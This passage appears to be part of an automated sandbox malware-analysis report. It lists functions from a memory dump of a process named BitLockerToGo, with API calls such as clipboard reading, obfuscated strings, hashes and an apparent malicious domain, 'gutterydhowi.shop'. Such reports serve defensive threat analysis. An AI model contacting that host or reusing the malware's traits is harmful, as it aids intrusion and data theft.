Instruction Fuzzy Hash: ADD17CB050C3809BD321DF198450B6FBBE1AB96744F58083EE4D0AB792D339C949CB9B

Function 004478C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044B10D,005C003F,00000006,?,?,00000018,%&' ,?,?), ref: 004478EE

Strings

%&' , xrefs: 004478C0, 004478DC, 004478EA

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: %&'
API String ID: 2994545307-1807952111
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00447A52 Relevance: 3.2, Strings: 2, Instructions: 665
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%sgh, xrefs: 00447F70
rqrs, xrefs: 00447B3C, 00447B13, 00447B1E

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %sgh$rqrs
API String ID: 0-3527893547
Opcode ID: d6a85dc7fbe1c1c895518e8c3bfdb46d1781aab9405564e4e6f07722bb65401e
Instruction ID: f698b76e75e7ee23a33e853f33ba18f1f05e61c861658b4bac9b11554cafc3c2
Opcode Fuzzy Hash: d6a85dc7fbe1c1c895518e8c3bfdb46d1781aab9405564e4e6f07722bb65401e
Instruction Fuzzy Hash: DB22BEB4904705CFEB20CF94D8906BEBBB1FF09316F24446DD841A73A2D7399A45CBA9

Function 00411DC7 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 004121F0
GetSystemDirectoryW.KERNEL32(61176739,00000104), ref: 00412203

Strings

gutterydhowi.shop, xrefs: 004121C5
B396D10155997F5EB1922E69BEE32460, xrefs: 00411DC7
ZDEJ, xrefs: 00411E6C
AR]J, xrefs: 00411E77
jxEJ, xrefs: 00411E61
\S, xrefs: 00412148

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: DirectorySystemUninitialize
String ID: AR]J$B396D10155997F5EB1922E69BEE32460$ZDEJ$\S$gutterydhowi.shop$jxEJ
API String ID: 1148197201-4105538071
Opcode ID: cfc3575762336dc91c3f28da536a221a985d113fd94f773326d5e0972ca87983
Instruction ID: af1d284dd17a56077a505731591563b5531676943e63ef9db87d23a742d7da5d
Opcode Fuzzy Hash: cfc3575762336dc91c3f28da536a221a985d113fd94f773326d5e0972ca87983
Instruction Fuzzy Hash: D4B158B54093C08AE3318F159550BEFBBE1FF96309F140A6EE8C89B252C3799945CB97

Function 00446B78 Relevance: 1.6, APIs: 1, Instructions: 79
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(93E091F3,00000000,00000800), ref: 00446C07

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 701db2d73713ccd2c5a489f7f531417896c89d73cf8e9e13675b0351d5aae81b
Instruction ID: 1184232c126871396a40c9f09ee93d8213ebe5ecf1fadd5739da675e62075050
Opcode Fuzzy Hash: 701db2d73713ccd2c5a489f7f531417896c89d73cf8e9e13675b0351d5aae81b
Instruction Fuzzy Hash: FD217C7510C381AFD304CF28E45061FBFE1AB99244F148C2DE4D49B352C738D949DB6A

Function 00444490 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(2A292837,00000000), ref: 00444503

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e4f83e339d1c80e8c0bd4eb59d2cd6297ebc35f0e0ab4305db0db93d93678ddc
Instruction ID: 150ce3c1fce968158f304b5400b5216191dc1c81b284fd2fbc7282f53ed5b89c
Opcode Fuzzy Hash: e4f83e339d1c80e8c0bd4eb59d2cd6297ebc35f0e0ab4305db0db93d93678ddc
Instruction Fuzzy Hash: B6016D3050C2409BD301EF58E944B1ABBF4AF9A719F454C6CE4C49B362C339EC64CB96

Function 004402D8 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(46C7BDF5), ref: 00440342

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 9bde9df3bf54cd82d0a9724c79b6d2bea2a1fe4599498153bb5336546873f5b9
Instruction ID: a5305217d66c799392d6ef90b171213b604f53b90f37ea6e8e911cbd3e01f507
Opcode Fuzzy Hash: 9bde9df3bf54cd82d0a9724c79b6d2bea2a1fe4599498153bb5336546873f5b9
Instruction Fuzzy Hash: 3CF0C2701082808FE3118F64D464A96BFE0EF5B315B680C4DD5C28B253D239A955CB98

Function 00411DA5 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411DB7

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: acc8ed081ea17f365b7282f1f7b4865a8946db1214ec5d5dd57bb0d3f635573a
Instruction ID: 3eb8adaed1ade2f177773a0edcc9a12e072916c06dcab30871de26297d2a5ded
Opcode Fuzzy Hash: acc8ed081ea17f365b7282f1f7b4865a8946db1214ec5d5dd57bb0d3f635573a
Instruction Fuzzy Hash: 4FD048383C8310BAF1300B48AC17F043110A702F22F700320B3207C0E189E07100861D

Function 00444476 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0044447C

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 352bb35c5e2606b30ac864d2f7b52b84560e382e9079bcab309ee548732d7c52
Instruction ID: a2b529eaca0e364e20160df31898c3b3e4797e8d5437b20f32d226d36c94ca22
Opcode Fuzzy Hash: 352bb35c5e2606b30ac864d2f7b52b84560e382e9079bcab309ee548732d7c52
Instruction Fuzzy Hash: 29B012700401105BD5101B04BC09F823F10AF80211F0500B0F404090B2D11298A5C5C9

Function 00411D80 Relevance: 1.3, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411D91

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d692132ea9e31f1fa97bb9d297b3dc6085a244c18d500800af68bbc5526c3f24
Instruction ID: af99181c2ca0d35fe25884a2480a5e64e826b22cf4d8ee898654547b5258ec23
Opcode Fuzzy Hash: d692132ea9e31f1fa97bb9d297b3dc6085a244c18d500800af68bbc5526c3f24
Instruction Fuzzy Hash: E6C0122415421577D34037355C1BF57355C8347762F000334BD62815E2FA205914C1B9

Non-executed Functions

Function 00429251 Relevance: 42.3, Strings: 33, Instructions: 1008COMMON

Download Yara Rule

Strings

&c+a, xrefs: 00429BD1
zr, xrefs: 00429560
*ge, xrefs: 00429BDC
0a>c, xrefs: 004296B5
VG, xrefs: 0042956B
X+V5, xrefs: 004293A0
s?{=, xrefs: 00429B42
IO, xrefs: 0042A276, 0042A288, 0042A2B4, 0042A253, 0042A25B
G7K1, xrefs: 004293AB
rO, xrefs: 00429555
4`[b, xrefs: 0042A5C0
*e(g, xrefs: 004296AA
C3A=, xrefs: 004293B6
uG, xrefs: 00429B84
L'i%, xrefs: 00429B2C
d{*ge&c+a/o$m, xrefs: 00429C70
yt, xrefs: 0042954A
9i;k, xrefs: 004296CB
T{*y, xrefs: 0042A077, 0042A083
tk, xrefs: 0042A031
/o$m, xrefs: 00429BC6
lSeQ, xrefs: 00429BA5
/), xrefs: 00429D9D
S], xrefs: 00429D66
{C&A, xrefs: 00429B79
QS, xrefs: 004292E5
`WbU, xrefs: 00429BB0
,s"q, xrefs: 0042A01E
4`[b, xrefs: 00429FD0
_Y, xrefs: 00429D71
WQ, xrefs: 00429D5B
=m=o, xrefs: 004296C0
A{Cy, xrefs: 004298E7

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: IO$&c+a$*e(g$*ge$,s"q$/o$m$0a>c$4`[b$4`[b$9i;k$=m=o$A{Cy$C3A=$G7K1$L'i%$QS$T{*y$VG$X+V5$`WbU$d{*ge&c+a/o$m$lSeQ$rO$s?{=$tk$uG$yt$zr${C&A$/)$S]$WQ$_Y
API String ID: 0-3589540364
Opcode ID: 1d92d58270b46c9fd7e170809ee4a080f432eda62733b2e69ca142db4eed8264
Instruction ID: 53e62f5edcb0457ed5bd09e3ab6726af2858833b552e8470ae76c2c7359a05a0
Opcode Fuzzy Hash: 1d92d58270b46c9fd7e170809ee4a080f432eda62733b2e69ca142db4eed8264
Instruction Fuzzy Hash: 09A23EB4208391CBD330CF25E580B9FBBE1BB95704F648A2DE9C89B251DB748945CB97

Function 0041DE06 Relevance: 41.3, Strings: 32, Instructions: 1283COMMON

Download Yara Rule

Strings

qvwM, xrefs: 0041E707
afgd, xrefs: 0041E6DB
PWVl, xrefs: 0041E6F1
`gfe, xrefs: 0041E6C5
Lz{x, xrefs: 0041E712
U3C5, xrefs: 0041EE0B
TKJp, xrefs: 0041E6FC
=BC@, xrefs: 0041E678
yGFE, xrefs: 0041E71D
pwvu, xrefs: 0041E699
\SRQ, xrefs: 0041E6E6
3K>M, xrefs: 0041EE21
lcba, xrefs: 0041E6BA
1674, xrefs: 0041E657
\[ZY, xrefs: 0041E956
l, xrefs: 0041E7AC
PONM, xrefs: 0041E977
tkji, xrefs: 0041E6A4
honm, xrefs: 0041E6AF
,+*), xrefs: 0041E92A
sz, xrefs: 0041DEB0
tDq, xrefs: 0041E8D2
=ONA, xrefs: 0041EE2C
g?@1, xrefs: 0041EE64
|srq, xrefs: 0041E68E
d[ZY, xrefs: 0041E6D0
$;:9, xrefs: 0041E8FE
H?Z, xrefs: 0041E98D
M7HI, xrefs: 0041EE16
USz, xrefs: 0041E96C
D, xrefs: 0041E998
XWV-, xrefs: 0041E961

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: $;:9$,+*)$1674$3K>M$=BC@$=ONA$D$H?Z$Lz{x$M7HI$PONM$PWVl$TKJp$U3C5$XWV-$\SRQ$\[ZY$`gfe$afgd$d[ZY$g?@1$honm$l$lcba$pwvu$qvwM$sz$tDq$tkji$yGFE$|srq$USz
API String ID: 0-2751118025
Opcode ID: 8912151999f93cf33eaf19f5d6f8183225ca6370f217d14d417358ad14d5f865
Instruction ID: 820434719b876211e1c845ade6bd2ba20d1e166851cce9ab9a08cdab5fe8a301
Opcode Fuzzy Hash: 8912151999f93cf33eaf19f5d6f8183225ca6370f217d14d417358ad14d5f865
Instruction Fuzzy Hash: F8B28CB55083809BD730CF15C840BEFBBE1BFC5344F54482EE9899B291E7799885CB9A

Function 00438F30 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00438F48
GetWindowLongW.USER32 ref: 00438F77
GetClipboardData.USER32 ref: 00438F87
CloseClipboard.USER32 ref: 00439096

Strings

3, xrefs: 00438FDB
I, xrefs: 00438FD7
!, xrefs: 00438FEF
y, xrefs: 00438FFB
", xrefs: 00438FE7
-, xrefs: 00438FDF
2, xrefs: 00438FEB
4, xrefs: 00439007
1, xrefs: 00438FE3
?, xrefs: 00438FF3
1, xrefs: 00439003
2, xrefs: 00438FFF
, xrefs: 00438FF7

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID: $!$"$-$1$1$2$2$3$4$?$I$y
API String ID: 1647500905-1952660950
Opcode ID: 7faec67253d8d4652386f68cf5c50ea40cad9be339fe731e3e6aa0286d4794de
Instruction ID: 1374d6e4e4ea6f88048af974981997ccd857af6a6a0f5140fb6aa1a00a74b686
Opcode Fuzzy Hash: 7faec67253d8d4652386f68cf5c50ea40cad9be339fe731e3e6aa0286d4794de
Instruction Fuzzy Hash: 4C41A274908285CFDB01AFB8D4483BFBFB0AB59304F15086ED485A7282D7B94A49D7A7

Function 00432080 Relevance: 20.6, APIs: 2, Strings: 9, Instructions: 1344COMMON

Download Yara Rule

Strings

OCXe, xrefs: 004322C7
NOHI, xrefs: 004322B3
tM@y, xrefs: 004322A9
VVOT, xrefs: 0043261D
JNGL, xrefs: 00432213
hzQ, xrefs: 004331D3
OHI~, xrefs: 00432209
JX ", xrefs: 0043351E
^<6, xrefs: 00432FCE

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: hzQ$JNGL$JX "$NOHI$OCXe$OHI~$VVOT$^<6$tM@y
API String ID: 0-3833750769
Opcode ID: c87b125aea639a8c889c41150734fdf6fb72e21a1ab7513b8464b6ca47d59ab8
Instruction ID: 618a7d30e6d1cd0aa609242f70e803cff76da33d19eb81b022a580236e7bbd48
Opcode Fuzzy Hash: c87b125aea639a8c889c41150734fdf6fb72e21a1ab7513b8464b6ca47d59ab8
Instruction Fuzzy Hash: D9A2AA70105B808EE722CF35C450BE3BBE1AF1B305F08599ED4EA8B292D779A545CB69

Function 00423672 Relevance: 14.2, Strings: 11, Instructions: 458COMMON

Download Yara Rule

Strings

{, xrefs: 004238A8
~, xrefs: 004238A0
x, xrefs: 004238D8
m, xrefs: 00423870
s, xrefs: 00423898
j, xrefs: 00423878
{, xrefs: 004238F0
x, xrefs: 004238B0
s, xrefs: 004238E0
u, xrefs: 004238B8
@, xrefs: 004238C0

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: @$j$m$s$s$u$x$x${${$~
API String ID: 0-3752588262
Opcode ID: 8cbb45887ed481bfada6ade6b5705e3df3a70cb4e06efc1f5446941a9f935738
Instruction ID: 7560e6934cf521fef64e624fcb83b695e21fd28e8c57d20b8c0acb784b212bcf
Opcode Fuzzy Hash: 8cbb45887ed481bfada6ade6b5705e3df3a70cb4e06efc1f5446941a9f935738
Instruction Fuzzy Hash: C7324B60508BC29ED322CF3C8488755BFA16B26324F088B9DD4F94BBD2D379E555C7A2

Function 0042B810 Relevance: 13.0, Strings: 10, Instructions: 486COMMON

Download Yara Rule

Strings

L!P#, xrefs: 0042BA21, 0042B9F4, 0042B9FD, 0042BA2B
7E9G, xrefs: 0042B8BF
4`[b, xrefs: 0042BE00
!Y)[, xrefs: 0042B887
4`[b, xrefs: 0042BEA0
(],_, xrefs: 0042B88F
4`[b, xrefs: 0042BBC0
a%a', xrefs: 0042B87F
9Q>S, xrefs: 0042B897
5M0O, xrefs: 0042B8AF

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: !Y)[$(],_$4`[b$4`[b$4`[b$5M0O$7E9G$9Q>S$L!P#$a%a'
API String ID: 0-2362609582
Opcode ID: 606d1be4e3839d3a8815f51e933f7e8b8d73c0a3f3b77b12424d690876d53a2b
Instruction ID: 2c92c18ef5b8a3ebd1598c876f7d75f41fbf98d88d8b054ef42e173ef4dd32a8
Opcode Fuzzy Hash: 606d1be4e3839d3a8815f51e933f7e8b8d73c0a3f3b77b12424d690876d53a2b
Instruction Fuzzy Hash: CE02BDB5608344DFE3209F25E881B6BBBF5FB86305F54882EE5C887252D775D800DB96

Function 00427ADF Relevance: 10.9, Strings: 8, Instructions: 908COMMON

Download Yara Rule

Strings

CONH, xrefs: 00427BF7
!>%3, xrefs: 00427C68, 00427C33
''9G, xrefs: 00427BBF
JGUi, xrefs: 00427BFF
+:8, xrefs: 00427B97
6(4$, xrefs: 00427B8F
3'14, xrefs: 00427BB7
+'%', xrefs: 00427B9F

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: !>%3$''9G$+'%'$+:8$3'14$6(4$$CONH$JGUi
API String ID: 0-3213100863
Opcode ID: 772f4c0a4fa55ff836fa3920d810acda386f9f8b37ee4ee4d1899030d7e2c7ea
Instruction ID: acfd76f1f92a431f7d8530c0d15668dd800cba2d3b66b2fa02148c2f9f7e4619
Opcode Fuzzy Hash: 772f4c0a4fa55ff836fa3920d810acda386f9f8b37ee4ee4d1899030d7e2c7ea
Instruction Fuzzy Hash: 71620371608352DFD314CF28E890A2AB7E1FF89311F55493DE891873A1D774E851CB96

Function 0042D2E2 Relevance: 10.8, Strings: 8, Instructions: 754COMMON

Download Yara Rule

Strings

LL, xrefs: 0042D614
", xrefs: 0042DF07
{u, xrefs: 0042D70D
4`[b, xrefs: 0042DA30
{'R!, xrefs: 0042D753, 0042D75B
hk, xrefs: 0042D72D
,K'E, xrefs: 0042D6ED
", xrefs: 0042DFFF

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "$"$,K'E$4`[b$LL$hk${'R!${u
API String ID: 0-3975141660
Opcode ID: a3f63a44f439dc3d18bcefe87d4dae844b7cdb5fa65d1ef29d06bb6990c473c2
Instruction ID: d0e3d3f28191dd1aaed76fe0af840cd102cb216e0205c0fbb6d8d8a62e9acc77
Opcode Fuzzy Hash: a3f63a44f439dc3d18bcefe87d4dae844b7cdb5fa65d1ef29d06bb6990c473c2
Instruction Fuzzy Hash: 4752E071A08391CFD310CF29E88071ABBE2AF86315F584A6DF4D58B392D739D905CB96

Function 00420832 Relevance: 10.7, Strings: 8, Instructions: 723COMMON

Download Yara Rule

Strings

{q, xrefs: 00420EF6
{ze, xrefs: 00420B5E
s}, xrefs: 00420B4E
{, xrefs: 00420D45
,(, xrefs: 00421021, 00421025
Z!"#, xrefs: 00420FF3, 00420FFB
(+, xrefs: 004209CB
Z!"#, xrefs: 00420FC6

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: (+$,($Z!"#$Z!"#${${q$s}${ze
API String ID: 0-417403309
Opcode ID: c682b1e7d6b47a2bd57b711d0444e1508b85fd33072374ca211d268ace4e762f
Instruction ID: ac7ce2ec06f152bf9702e32c595c3ba2ead6e9961933700c5658f841ea176d11
Opcode Fuzzy Hash: c682b1e7d6b47a2bd57b711d0444e1508b85fd33072374ca211d268ace4e762f
Instruction Fuzzy Hash: FE2289B46083509BC710EF19E881A2FBBF1EF95308F44891DE5D48B362D379D904CB9A

Function 00420780 Relevance: 10.7, Strings: 8, Instructions: 720COMMON

Download Yara Rule

Strings

{q, xrefs: 00420EF6
{ze, xrefs: 00420B5E
s}, xrefs: 00420B4E
{, xrefs: 00420D45
,(, xrefs: 00421021, 00421025
Z!"#, xrefs: 00420FF3, 00420FFB
(+, xrefs: 004209CB
Z!"#, xrefs: 00420FC6

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: (+$,($Z!"#$Z!"#${${q$s}${ze
API String ID: 0-417403309
Opcode ID: e0feee823208632fe490fb8fa09b12ad70665ed68b8e81f925db4cfb823cb5b1
Instruction ID: 8cfe1411c91ca016cca9b65053f7a204cc753ecfdcfad39e43993c370a45be26
Opcode Fuzzy Hash: e0feee823208632fe490fb8fa09b12ad70665ed68b8e81f925db4cfb823cb5b1
Instruction Fuzzy Hash: 1F2278B46083509BC710EF19E881A2FBBF5AF96708F54891DE5D48B362D379D804CB9B

Function 0042D578 Relevance: 10.7, Strings: 8, Instructions: 679COMMON

Download Yara Rule

Strings

LL, xrefs: 0042D614
", xrefs: 0042DF07
{u, xrefs: 0042D70D
", xrefs: 0042DFAB
4`[b, xrefs: 0042DA30
{'R!, xrefs: 0042D753, 0042D75B
hk, xrefs: 0042D72D
,K'E, xrefs: 0042D6ED

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "$"$,K'E$4`[b$LL$hk${'R!${u
API String ID: 0-3975141660
Opcode ID: b93b3a2fc762e5d61fbb3c1bc1c418246c740b2db7d13c0824f3e074919772bd
Instruction ID: 079ba332ffedcd6877d7e27d26dc4fe24c45214bcc0be2f111501913826c6496
Opcode Fuzzy Hash: b93b3a2fc762e5d61fbb3c1bc1c418246c740b2db7d13c0824f3e074919772bd
Instruction Fuzzy Hash: 7042E071A08391CFD310CF29E88071ABBE1AF86315F544A6DF4D88B3A2D779D904CB96

Function 00401000 Relevance: 10.6, Strings: 7, Instructions: 1879COMMON

Download Yara Rule

Strings

gfff, xrefs: 00401FED
gfff, xrefs: 00401FA1
@, xrefs: 00402FA5
gfff, xrefs: 00401F2E
0123456789abcdefxp, xrefs: 0040155D, 00401617
0123456789ABCDEFXP, xrefs: 00401553, 0040160A
-, xrefs: 00401ED9

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
API String ID: 0-2517803157
Opcode ID: 9318d18802d0a23a05142fc28a8ba9897d765824c8548c84b5f3e0a89e16337c
Instruction ID: 25021f968a003304304ebb787814001a74eba6bec627bb5905242a9c19defe5f
Opcode Fuzzy Hash: 9318d18802d0a23a05142fc28a8ba9897d765824c8548c84b5f3e0a89e16337c
Instruction Fuzzy Hash: DEE2D4716083418FD718CE28C49436BBBE2ABC5314F188A3EE895AB3D1D779DD45CB86

Function 00432AB3 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 715COMMON

Download Yara Rule

Strings

{zyG, xrefs: 004333CB
hzQ, xrefs: 004331D3
^<6, xrefs: 00432FCE

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: hzQ$^<6${zyG
API String ID: 0-2734774335
Opcode ID: 96e88777b9ab619914249f160b261c6f3df339d7dd92459af3ec99c923b40c39
Instruction ID: 8922f66dbec50a8b2aa017301922af89cd1c5d83d86d777acd695ed848868f74
Opcode Fuzzy Hash: 96e88777b9ab619914249f160b261c6f3df339d7dd92459af3ec99c923b40c39
Instruction Fuzzy Hash: 08427A70505F808EE7228F35C850BE3BBE0AF1B306F44585ED4EA8B292D779B545CB69

Function 00428710 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 476COMMON

Download Yara Rule

Strings

8k:i, xrefs: 004288E4, 004288ED
45, xrefs: 00428D2A
EC, xrefs: 004289E3
][, xrefs: 004289F3

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 45$8k:i$EC$][
API String ID: 0-1536560401
Opcode ID: fc79e3ea8817e45a403f46d2ba62bd861a76cc8355d9894941d2d9a2e7530120
Instruction ID: 4b87d8b72da7a5b73b39809268b927e8226a99fed9f596290bc683b62d14d45e
Opcode Fuzzy Hash: fc79e3ea8817e45a403f46d2ba62bd861a76cc8355d9894941d2d9a2e7530120
Instruction Fuzzy Hash: 050223B0209380ABD310DF55E980A1FBBF4AF96749F504A1EF4C49B252D778D905CBAB

Function 00433FB3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 470libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(43D141D5,00000000,00000800), ref: 0043429A
LoadLibraryExW.KERNEL32(43D141D5,00000000,00000800), ref: 0043459A

Strings

"MO, xrefs: 00434522
jXJ,, xrefs: 004342CD
, ~\, xrefs: 004343BC

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: "MO$, ~\$jXJ,
API String ID: 1029625771-442276191
Opcode ID: d221b12932aca23991ddfec45b73cf6a4d6671826aa31c8030e48d21f4f4b7bf
Instruction ID: 22dc96b4d41f2e53143f9473b2e08102539f72e41d9b6fab31b9769e4655a6f5
Opcode Fuzzy Hash: d221b12932aca23991ddfec45b73cf6a4d6671826aa31c8030e48d21f4f4b7bf
Instruction Fuzzy Hash: 3FF16770504F808EEB328B358494BA3FBE0AB1B305F54598EE5F68B692C739F445CB65

Function 0040FB7C Relevance: 9.0, Strings: 7, Instructions: 257COMMON

Download Yara Rule

Strings

yw, xrefs: 0040FBD1
-0, xrefs: 0040FCFB
}{, xrefs: 0040FBCA
q9, xrefs: 0040FCE7
97, xrefs: 0040FCF1
-+, xrefs: 0040FC56
%#, xrefs: 0040FC64

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
